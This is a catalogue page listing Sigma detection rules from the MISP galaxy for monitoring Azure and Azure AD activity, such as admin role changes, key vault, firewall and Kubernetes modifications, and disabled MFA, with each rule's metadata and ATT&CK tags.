To see the related clusters, click here.

Changes to Device Registration Policy

Monitor and alert for changes to the device registration policy.

Internal MISP references

UUID 9494bff8-959f-4440-bbce-fb87a208d517 which can be used as unique global reference for Changes to Device Registration Policy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_device_registration_policy_changes.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1484']
Related clusters

To see the related clusters, click here.

Privileged Account Creation

Detects when a new admin is created.

Internal MISP references

UUID f7b5b004-dece-46e4-a4a5-f6fd0e1c6947 which can be used as unique global reference for Privileged Account Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton
creation_date 2022/08/11
falsepositive ['A legitimate new admin account being created']
filename azure_privileged_account_creation.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

User Removed From Group With CA Policy Modification Access

Monitor and alert on group membership removal of groups that have CA policy modification access

Internal MISP references

UUID 665e2d43-70dc-4ccc-9d27-026c9dd7ed9c which can be used as unique global reference for User Removed From Group With CA Policy Modification Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'
creation_date 2022/08/04
falsepositive ['User removed from the group is approved']
filename azure_group_user_removal_ca_modification.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1548', 'attack.t1556']
Related clusters

To see the related clusters, click here.

Detects when end user consent is blocked due to risk-based consent.

Internal MISP references

UUID 7091372f-623c-4293-bc37-20c32b3492be which can be used as unique global reference for End User Consent Blocked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/10
falsepositive ['Unknown']
filename azure_app_end_user_consent_blocked.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1528']
Related clusters

To see the related clusters, click here.

Azure Service Principal Created

Identifies when a service principal is created in Azure.

Internal MISP references

UUID 0ddcff6d-d262-40b0-804b-80eb592de8e3 which can be used as unique global reference for Azure Service Principal Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/02
falsepositive ['Service principal being created may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_service_principal_created.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion']

Azure Key Vault Modified or Deleted

Identifies when a key vault is modified or deleted.

Internal MISP references

UUID 459a2970-bb84-4e6a-a32e-ff0fbd99448d which can be used as unique global reference for Azure Key Vault Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/16
falsepositive ['Key Vault being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_keyvault_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.credential_access', 'attack.t1552', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Azure Firewall Rule Collection Modified or Deleted

Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.

Internal MISP references

UUID 025c9fe7-db72-49f9-af0d-31341dd7dd57 which can be used as unique global reference for Azure Firewall Rule Collection Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_firewall_rule_collection_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Azure Kubernetes Admission Controller

Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.

Internal MISP references

UUID a61a3c56-4ce2-4351-a079-88ae4cbd2b58 which can be used as unique global reference for Azure Kubernetes Admission Controller in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/25
falsepositive ['Azure Kubernetes Admissions Controller may be done by a system administrator.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_admission_controller.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1078', 'attack.credential_access', 'attack.t1552', 'attack.t1552.007']
Related clusters

To see the related clusters, click here.

Rare Subscription-level Operations In Azure

Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.

Internal MISP references

UUID c1182e02-49a3-481c-b3de-0fadc4091488 which can be used as unique global reference for Rare Subscription-level Operations In Azure in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sawwinnnaung
creation_date 2020/05/07
falsepositive ['Valid change']
filename azure_rare_operations.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.t1003']
Related clusters

To see the related clusters, click here.

Azure Application Gateway Modified or Deleted

Identifies when a application gateway is modified or deleted.

Internal MISP references

UUID ad87d14e-7599-4633-ba81-aeb60cfe8cd6 which can be used as unique global reference for Azure Application Gateway Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/16
falsepositive ['Application gateway being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_application_gateway_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Application Security Group Modified or Deleted

Identifies when a application security group is modified or deleted.

Internal MISP references

UUID 835747f1-9329-40b5-9cc3-97d465754ce6 which can be used as unique global reference for Azure Application Security Group Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/16
falsepositive ['Application security group being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_application_security_group_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Kubernetes Pods Deleted

Identifies the deletion of Azure Kubernetes Pods.

Internal MISP references

UUID b02f9591-12c3-4965-986a-88028629b2e1 which can be used as unique global reference for Azure Kubernetes Pods Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_pods_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Device or Configuration Modified or Deleted

Identifies when a device or device configuration in azure is modified or deleted.

Internal MISP references

UUID 46530378-f9db-4af9-a9e5-889c177d3881 which can be used as unique global reference for Azure Device or Configuration Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/03
falsepositive ['Device or device configuration being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_device_or_configuration_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.t1485', 'attack.t1565.001']
Related clusters

To see the related clusters, click here.

Azure Application Deleted

Identifies when a application is deleted in Azure.

Internal MISP references

UUID 410d2a41-1e6d-452f-85e5-abdd8257a823 which can be used as unique global reference for Azure Application Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/03
falsepositive ['Application being deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_application_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Azure Subscription Permission Elevation Via ActivityLogs

Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.

Internal MISP references

UUID 09438caa-07b1-4870-8405-1dbafe3dad95 which can be used as unique global reference for Azure Subscription Permission Elevation Via ActivityLogs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/26
falsepositive ['If this was approved by System Administrator.']
filename azure_subscription_permissions_elevation_via_activitylogs.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Azure Firewall Rule Configuration Modified or Deleted

Identifies when a Firewall Rule Configuration is Modified or Deleted.

Internal MISP references

UUID 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 which can be used as unique global reference for Azure Firewall Rule Configuration Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_network_firewall_rule_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Kubernetes Cluster Created or Deleted

Detects when a Azure Kubernetes Cluster is created or deleted.

Internal MISP references

UUID 9541f321-7cba-4b43-80fc-fbd1fb922808 which can be used as unique global reference for Azure Kubernetes Cluster Created or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_cluster_created_or_deleted.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Network Security Configuration Modified or Deleted

Identifies when a network security configuration is modified or deleted.

Internal MISP references

UUID d22b4df4-5a67-4859-a578-8c9a0b5af9df which can be used as unique global reference for Azure Network Security Configuration Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_network_security_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Number Of Resource Creation Or Deployment Activities

Number of VM creations or deployment activities occur in Azure via the azureactivity log.

Internal MISP references

UUID d2d901db-7a75-45a1-bc39-0cbf00812192 which can be used as unique global reference for Number Of Resource Creation Or Deployment Activities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sawwinnnaung
creation_date 2020/05/07
falsepositive ['Valid change']
filename azure_creating_number_of_resources_detection.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Azure Virtual Network Device Modified or Deleted

Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router.

Internal MISP references

UUID 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 which can be used as unique global reference for Azure Virtual Network Device Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_network_virtual_device_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Network Firewall Policy Modified or Deleted

Identifies when a Firewall Policy is Modified or Deleted.

Internal MISP references

UUID 83c17918-746e-4bd9-920b-8e098bf88c23 which can be used as unique global reference for Azure Network Firewall Policy Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/02
falsepositive ['Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_network_firewall_policy_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1562.007']
Related clusters

To see the related clusters, click here.

Azure Service Principal Removed

Identifies when a service principal was removed in Azure.

Internal MISP references

UUID 448fd1ea-2116-4c62-9cde-a92d120e0f08 which can be used as unique global reference for Azure Service Principal Removed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/03
falsepositive ['Service principal being removed may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_service_principal_removed.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion']

Azure New CloudShell Created

Identifies when a new cloudshell is created inside of Azure portal.

Internal MISP references

UUID 72af37e2-ec32-47dc-992b-bc288a2708cb which can be used as unique global reference for Azure New CloudShell Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/09/21
falsepositive ['A new cloudshell may be created by a system administrator.']
filename azure_new_cloudshell_created.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Azure Application Credential Modified

Identifies when a application credential is modified.

Internal MISP references

UUID cdeef967-f9a1-4375-90ee-6978c5f23974 which can be used as unique global reference for Azure Application Credential Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/02
falsepositive ['Application credential added may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_app_credential_modification.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Active Directory Hybrid Health AD FS Service Delete

This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.

Internal MISP references

UUID 48739819-8230-4ee3-a8ea-e0289d1fb0ff which can be used as unique global reference for Azure Active Directory Hybrid Health AD FS Service Delete in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/08/26
falsepositive ['Legitimate AAD Health AD FS service instances being deleted in a tenant']
filename azure_aadhybridhealth_adfs_service_delete.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1578.003']
Related clusters

To see the related clusters, click here.

Azure Suppression Rule Created

Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.

Internal MISP references

UUID 92cc3e5d-eb57-419d-8c16-5c63f325a401 which can be used as unique global reference for Azure Suppression Rule Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/16
falsepositive ['Suppression Rule being created may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_suppression_rule_created.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Active Directory Hybrid Health AD FS New Server

This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.

Internal MISP references

UUID 288a39fc-4914-4831-9ada-270e9dc12cb4 which can be used as unique global reference for Azure Active Directory Hybrid Health AD FS New Server in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/08/26
falsepositive ['Legitimate AD FS servers added to an AAD Health AD FS service instance']
filename azure_aadhybridhealth_adfs_new_server.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1578']
Related clusters

To see the related clusters, click here.

Azure Owner Removed From Application or Service Principal

Identifies when a owner is was removed from a application or service principal in Azure.

Internal MISP references

UUID 636e30d5-3736-42ea-96b1-e6e2f8429fd6 which can be used as unique global reference for Azure Owner Removed From Application or Service Principal in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/03
falsepositive ['Owner being removed may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_owner_removed_from_application_or_service_principal.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion']

Granting Of Permissions To An Account

Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.

Internal MISP references

UUID a622fcd2-4b5a-436a-b8a2-a4171161833c which can be used as unique global reference for Granting Of Permissions To An Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sawwinnnaung
creation_date 2020/05/07
falsepositive ['Valid change']
filename azure_granting_permission_detection.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1098.003']
Related clusters

To see the related clusters, click here.

Azure Kubernetes Secret or Config Object Access

Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.

Internal MISP references

UUID 7ee0b4aa-d8d4-4088-b661-20efdf41a04c which can be used as unique global reference for Azure Kubernetes Secret or Config Object Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_secret_or_config_object_access.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Kubernetes Sensitive Role Access

Identifies when ClusterRoles/Roles are being modified or deleted.

Internal MISP references

UUID 818fee0c-e0ec-4e45-824e-83e4817b0887 which can be used as unique global reference for Azure Kubernetes Sensitive Role Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_role_access.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Keyvault Key Modified or Deleted

Identifies when a Keyvault Key is modified or deleted in Azure.

Internal MISP references

UUID 80eeab92-0979-4152-942d-96749e11df40 which can be used as unique global reference for Azure Keyvault Key Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/16
falsepositive ['Key being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_keyvault_key_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.credential_access', 'attack.t1552', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Azure VPN Connection Modified or Deleted

Identifies when a VPN connection is modified or deleted.

Internal MISP references

UUID 61171ffc-d79c-4ae5-8e10-9323dba19cd3 which can be used as unique global reference for Azure VPN Connection Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_vpn_connection_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Container Registry Created or Deleted

Detects when a Container Registry is created or deleted.

Internal MISP references

UUID 93e0ef48-37c8-49ed-a02c-038aab23628e which can be used as unique global reference for Azure Container Registry Created or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_container_registry_created_or_deleted.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Kubernetes Events Deleted

Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.

Internal MISP references

UUID 225d8b09-e714-479c-a0e4-55e6f29adf35 which can be used as unique global reference for Azure Kubernetes Events Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_events_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1562', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

User Added to an Administrator's Azure AD Role

User Added to an Administrator's Azure AD Role

Internal MISP references

UUID ebbeb024-5b1d-4e16-9c0c-917f86c708a7 which can be used as unique global reference for User Added to an Administrator's Azure AD Role in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Raphaël CALVET, @MetallicHack
creation_date 2021/10/04
falsepositive ["PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled."]
filename azure_ad_user_added_to_admin_role.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098.003', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Azure Kubernetes CronJob

Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

Internal MISP references

UUID 1c71e254-6655-42c1-b2d6-5e4718d7fc0a which can be used as unique global reference for Azure Kubernetes CronJob in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/22
falsepositive ['Azure Kubernetes CronJob/Job may be done by a system administrator.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_cronjob.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1053.003', 'attack.privilege_escalation', 'attack.execution']
Related clusters

To see the related clusters, click here.

Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted

Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.

Internal MISP references

UUID 25cb259b-bbdc-4b87-98b7-90d7c72f8743 which can be used as unique global reference for Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_rolebinding_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.credential_access']

Azure Firewall Modified or Deleted

Identifies when a firewall is created, modified, or deleted.

Internal MISP references

UUID 512cf937-ea9b-4332-939c-4c2c94baadcd which can be used as unique global reference for Azure Firewall Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_firewall_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Azure DNS Zone Modified or Deleted

Identifies when DNS zone is modified or deleted.

Internal MISP references

UUID af6925b0-8826-47f1-9324-337507a0babd which can be used as unique global reference for Azure DNS Zone Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_dns_zone_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.t1565.001']
Related clusters

To see the related clusters, click here.

Azure Virtual Network Modified or Deleted

Identifies when a Virtual Network is modified or deleted in Azure.

Internal MISP references

UUID bcfcc962-0e4a-4fd9-84bb-a833e672df3f which can be used as unique global reference for Azure Virtual Network Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_virtual_network_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Device No Longer Managed or Compliant

Identifies when a device in azure is no longer managed or compliant

Internal MISP references

UUID 542b9912-c01f-4e3f-89a8-014c48cdca7d which can be used as unique global reference for Azure Device No Longer Managed or Compliant in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/03
falsepositive ['Administrator may have forgotten to review the device.']
filename azure_device_no_longer_managed_or_compliant.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Disabled MFA to Bypass Authentication Mechanisms

Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.

Internal MISP references

UUID 7ea78478-a4f9-42a6-9dcd-f861816122bf which can be used as unique global reference for Disabled MFA to Bypass Authentication Mechanisms in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ionsor
creation_date 2022/02/08
falsepositive ['Authorized modification by administrators']
filename azure_mfa_disabled.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1556']
Related clusters

To see the related clusters, click here.

Azure Point-to-site VPN Modified or Deleted

Identifies when a Point-to-site VPN is Modified or Deleted.

Internal MISP references

UUID d9557b75-267b-4b43-922f-a775e2d1f792 which can be used as unique global reference for Azure Point-to-site VPN Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
